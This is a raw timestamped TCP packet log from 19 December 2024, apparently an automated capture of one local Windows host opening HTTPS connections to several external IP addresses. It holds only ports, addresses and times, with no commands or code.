                                                                            Dec 19, 2024 15:36:25.424853086 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.427748919 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.427818060 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.433334112 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.433394909 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.439099073 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.439163923 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.442040920 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.442101955 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.447808027 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.447881937 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.451050997 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.451114893 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.451144934 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.451164007 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.451199055 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.451227903 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.451298952 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.451328039 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.451343060 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.451369047 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.455256939 CET49738443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.455305099 CET44349738104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.457578897 CET49738443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.457578897 CET49738443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.457607031 CET44349738104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.663665056 CET49739443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.663712025 CET44349739104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.663805008 CET49739443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.664063931 CET49739443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.664077997 CET44349739104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:26.347567081 CET4434973735.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:26.347966909 CET49737443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:26.348002911 CET4434973735.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:26.348769903 CET4434973735.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:26.349272966 CET49737443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:26.349416971 CET4434973735.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:26.349451065 CET49737443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:26.395041943 CET49737443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:26.395085096 CET4434973735.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:26.667843103 CET44349738104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:26.668227911 CET49738443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:26.668251038 CET44349738104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:26.668658018 CET44349738104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:26.669059038 CET49738443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:26.669131994 CET44349738104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:26.669239044 CET49738443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:26.711328983 CET44349738104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:26.809267998 CET4434973735.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:26.809355021 CET4434973735.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:26.809590101 CET49737443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:26.809737921 CET49737443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:26.809762001 CET4434973735.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:26.809773922 CET49737443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:26.809815884 CET49737443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:26.873723984 CET44349739104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:26.874089003 CET49739443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:26.874109983 CET44349739104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:26.874455929 CET44349739104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:26.874893904 CET49739443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:26.874959946 CET44349739104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:26.875071049 CET49739443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:26.915338039 CET44349739104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:26.921031952 CET49739443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:27.074558020 CET44349717172.217.19.164192.168.2.17
                                                                            Dec 19, 2024 15:36:27.074635983 CET44349717172.217.19.164192.168.2.17
                                                                            Dec 19, 2024 15:36:27.074708939 CET49717443192.168.2.17172.217.19.164
                                                                            Dec 19, 2024 15:36:27.115463972 CET44349738104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:27.115542889 CET44349738104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:27.115691900 CET49738443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:27.116462946 CET49738443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:27.116485119 CET44349738104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:27.223510027 CET49717443192.168.2.17172.217.19.164
                                                                            Dec 19, 2024 15:36:27.223547935 CET44349717172.217.19.164192.168.2.17
                                                                            Dec 19, 2024 15:36:27.333885908 CET44349739104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:27.333981991 CET44349739104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:27.334047079 CET44349739104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:27.334074020 CET49739443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:27.334115028 CET49739443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:27.334815979 CET49739443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:27.334847927 CET44349739104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:27.352673054 CET49740443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:27.352730989 CET44349740104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:27.352927923 CET49740443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:27.353240013 CET49740443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:27.353250980 CET44349740104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:28.016743898 CET4968280192.168.2.17192.229.211.108
                                                                            Dec 19, 2024 15:36:28.319058895 CET4968280192.168.2.17192.229.211.108
                                                                            Dec 19, 2024 15:36:28.563960075 CET44349740104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:28.564256907 CET49740443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:28.564285040 CET44349740104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:28.564625025 CET44349740104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:28.564930916 CET49740443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:28.565001965 CET44349740104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:28.565059900 CET49740443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:28.611331940 CET44349740104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:28.893066883 CET49680443192.168.2.1720.189.173.13
                                                                            Dec 19, 2024 15:36:28.925055981 CET4968280192.168.2.17192.229.211.108
                                                                            Dec 19, 2024 15:36:29.012129068 CET44349740104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:29.012228012 CET44349740104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:29.012701035 CET49740443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:29.013108969 CET49740443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:29.013129950 CET44349740104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:29.015502930 CET49741443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:29.015542984 CET44349741104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:29.015656948 CET49741443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:29.015858889 CET49741443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:29.015866041 CET44349741104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:29.655926943 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:29.655982018 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:29.656043053 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:29.656426907 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:29.656441927 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.130059958 CET4968280192.168.2.17192.229.211.108
                                                                            Dec 19, 2024 15:36:30.227926970 CET44349741104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.228234053 CET49741443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:30.228251934 CET44349741104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.228589058 CET44349741104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.228909969 CET49741443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:30.228979111 CET44349741104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.229080915 CET49741443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:30.275331974 CET44349741104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.676690102 CET44349741104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.676778078 CET44349741104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.676847935 CET49741443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:30.678109884 CET49741443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:30.678133011 CET44349741104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.868683100 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.868980885 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:30.869010925 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.869345903 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.869673967 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:30.869741917 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.869813919 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:30.869914055 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:30.869935989 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:30.870110989 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:30.870134115 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.483689070 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.483737946 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.483763933 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.483792067 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.483819962 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.483845949 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.483845949 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.483885050 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.483920097 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.483920097 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.491974115 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.492053032 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.492080927 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.500458956 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.500564098 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.500587940 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.549092054 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.549123049 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.597073078 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.603286028 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.645092010 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.675906897 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.679764032 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.679821968 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.679845095 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.687503099 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.687563896 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.687591076 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.695384026 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.695442915 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.695465088 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.703136921 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.703205109 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.704755068 CET49742443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:31.704787016 CET44349742104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.706732988 CET49743443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:31.706784010 CET44349743104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:31.707372904 CET49743443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:31.707712889 CET49743443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:31.707727909 CET44349743104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:32.538094044 CET4968280192.168.2.17192.229.211.108
                                                                            Dec 19, 2024 15:36:32.919101000 CET44349743104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:32.920382977 CET49743443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:32.920396090 CET44349743104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:32.921372890 CET44349743104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:32.924204111 CET49743443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:32.924360037 CET49743443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:32.924365997 CET44349743104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:32.924494982 CET44349743104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:32.969109058 CET49743443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:33.369710922 CET44349743104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:33.369801998 CET44349743104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:33.369884014 CET49743443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:33.370512962 CET49743443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:33.370533943 CET44349743104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:34.341124058 CET49675443192.168.2.17204.79.197.203
                                                                            Dec 19, 2024 15:36:37.341176033 CET4968280192.168.2.17192.229.211.108
                                                                            Dec 19, 2024 15:36:38.504169941 CET49680443192.168.2.1720.189.173.13
                                                                            Dec 19, 2024 15:36:46.952239037 CET4968280192.168.2.17192.229.211.108
                                                                            Dec 19, 2024 15:36:47.567208052 CET49691443192.168.2.17204.79.197.200
                                                                            Dec 19, 2024 15:36:47.687285900 CET44349691204.79.197.200192.168.2.17
                                                                            Dec 19, 2024 15:36:47.881764889 CET44349691204.79.197.200192.168.2.17
                                                                            Dec 19, 2024 15:36:47.881952047 CET49691443192.168.2.17204.79.197.200
                                                                            Dec 19, 2024 15:36:47.883240938 CET49691443192.168.2.17204.79.197.200
                                                                            Dec 19, 2024 15:36:47.883327961 CET49691443192.168.2.17204.79.197.200
                                                                            Dec 19, 2024 15:36:47.883544922 CET49691443192.168.2.17204.79.197.200
                                                                            Dec 19, 2024 15:36:47.883655071 CET49691443192.168.2.17204.79.197.200
                                                                            Dec 19, 2024 15:36:48.002782106 CET44349691204.79.197.200192.168.2.17
                                                                            Dec 19, 2024 15:36:48.002809048 CET44349691204.79.197.200192.168.2.17
                                                                            Dec 19, 2024 15:36:48.002978086 CET44349691204.79.197.200192.168.2.17
                                                                            Dec 19, 2024 15:36:48.002988100 CET44349691204.79.197.200192.168.2.17
                                                                            Dec 19, 2024 15:36:48.003079891 CET44349691204.79.197.200192.168.2.17
                                                                            Dec 19, 2024 15:36:48.139240980 CET44349691204.79.197.200192.168.2.17
                                                                            Dec 19, 2024 15:36:48.139358997 CET49691443192.168.2.17204.79.197.200
                                                                            Dec 19, 2024 15:36:48.330986023 CET44349691204.79.197.200192.168.2.17
                                                                            Dec 19, 2024 15:36:48.331059933 CET49691443192.168.2.17204.79.197.200
                                                                            Dec 19, 2024 15:36:58.533276081 CET49691443192.168.2.17204.79.197.200
                                                                            Dec 19, 2024 15:36:58.653211117 CET44349691204.79.197.200192.168.2.17
                                                                            Dec 19, 2024 15:37:15.555614948 CET49749443192.168.2.17172.217.19.164
                                                                            Dec 19, 2024 15:37:15.555676937 CET44349749172.217.19.164192.168.2.17
                                                                            Dec 19, 2024 15:37:15.555766106 CET49749443192.168.2.17172.217.19.164
                                                                            Dec 19, 2024 15:37:15.555993080 CET49749443192.168.2.17172.217.19.164
                                                                            Dec 19, 2024 15:37:15.556005001 CET44349749172.217.19.164192.168.2.17
                                                                            Dec 19, 2024 15:37:17.247464895 CET44349749172.217.19.164192.168.2.17
                                                                            Dec 19, 2024 15:37:17.247802019 CET49749443192.168.2.17172.217.19.164
                                                                            Dec 19, 2024 15:37:17.247843027 CET44349749172.217.19.164192.168.2.17
                                                                            Dec 19, 2024 15:37:17.248210907 CET44349749172.217.19.164192.168.2.17
                                                                            Dec 19, 2024 15:37:17.248527050 CET49749443192.168.2.17172.217.19.164
                                                                            Dec 19, 2024 15:37:17.248594999 CET44349749172.217.19.164192.168.2.17
                                                                            Dec 19, 2024 15:37:17.296509981 CET49749443192.168.2.17172.217.19.164
                                                                            Dec 19, 2024 15:37:26.945601940 CET44349749172.217.19.164192.168.2.17
                                                                            Dec 19, 2024 15:37:26.945677042 CET44349749172.217.19.164192.168.2.17
                                                                            Dec 19, 2024 15:37:26.945791006 CET49749443192.168.2.17172.217.19.164
                                                                            Dec 19, 2024 15:37:27.227148056 CET49749443192.168.2.17172.217.19.164
                                                                            Dec 19, 2024 15:37:27.227158070 CET44349749172.217.19.164192.168.2.17
                                                                            Dec 19, 2024 15:37:37.171921015 CET49751443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:37:37.171971083 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:37.172056913 CET49751443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:37:37.172283888 CET49751443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:37:37.172296047 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.384224892 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.384687901 CET49751443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:37:38.384727001 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.385133028 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.385507107 CET49751443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:37:38.385586023 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.385654926 CET49751443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:37:38.385771036 CET49751443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:37:38.385809898 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.385924101 CET49751443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:37:38.385960102 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.994555950 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.994775057 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.994868994 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.994880915 CET49751443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:37:38.994913101 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.994968891 CET49751443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:37:38.994983912 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.995153904 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:38.995215893 CET49751443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:37:38.996268034 CET49751443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:37:38.996304989 CET44349751104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:37:39.139121056 CET49752443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:37:39.139164925 CET44349752104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:37:39.139280081 CET49752443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:37:39.139568090 CET49752443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:37:39.139584064 CET44349752104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:37:39.415668964 CET49753443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:39.415786028 CET44349753172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:39.415890932 CET49753443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:39.416210890 CET49753443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:39.416239977 CET44349753172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:40.350502014 CET44349752104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:37:40.350898981 CET49752443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:37:40.350909948 CET44349752104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:37:40.351366997 CET44349752104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:37:40.351702929 CET49752443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:37:40.351784945 CET44349752104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:37:40.353008032 CET49752443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:37:40.399322033 CET44349752104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:37:40.793661118 CET44349752104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:37:40.793752909 CET44349752104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:37:40.793801069 CET49752443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:37:40.794467926 CET49752443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:37:40.794482946 CET44349752104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:37:40.871613979 CET44349753172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:40.871985912 CET49753443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:40.872016907 CET44349753172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:40.873178959 CET44349753172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:40.873275042 CET49753443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:40.873620033 CET49753443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:40.873637915 CET49753443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:40.873689890 CET44349753172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:40.873723030 CET49753443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:40.873747110 CET49753443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:40.874116898 CET49755443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:40.874155998 CET44349755172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:40.874243021 CET49755443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:40.874460936 CET49755443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:40.874470949 CET44349755172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:42.101296902 CET44349755172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:42.101897955 CET49755443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:42.101931095 CET44349755172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:42.103069067 CET44349755172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:42.103172064 CET49755443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:42.104449987 CET49755443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:42.104510069 CET44349755172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:42.104655027 CET49755443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:42.104660988 CET44349755172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:42.153825998 CET49755443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:43.192213058 CET44349755172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:43.192317963 CET44349755172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:43.192420006 CET49755443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:43.193504095 CET49755443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:43.193521023 CET44349755172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:43.350218058 CET49756443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:43.350323915 CET44349756172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:43.350436926 CET49756443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:43.350831032 CET49756443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:43.350862980 CET44349756172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:44.566509962 CET44349756172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:44.566862106 CET49756443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:44.566894054 CET44349756172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:44.568435907 CET44349756172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:44.568527937 CET49756443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:44.568933010 CET49756443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:44.568957090 CET49756443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:44.569010019 CET44349756172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:44.569015980 CET49756443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:44.569077969 CET49756443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:44.569462061 CET49759443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:44.569515944 CET44349759172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:44.569621086 CET49759443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:44.569890976 CET49759443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:44.569902897 CET44349759172.67.134.110192.168.2.17
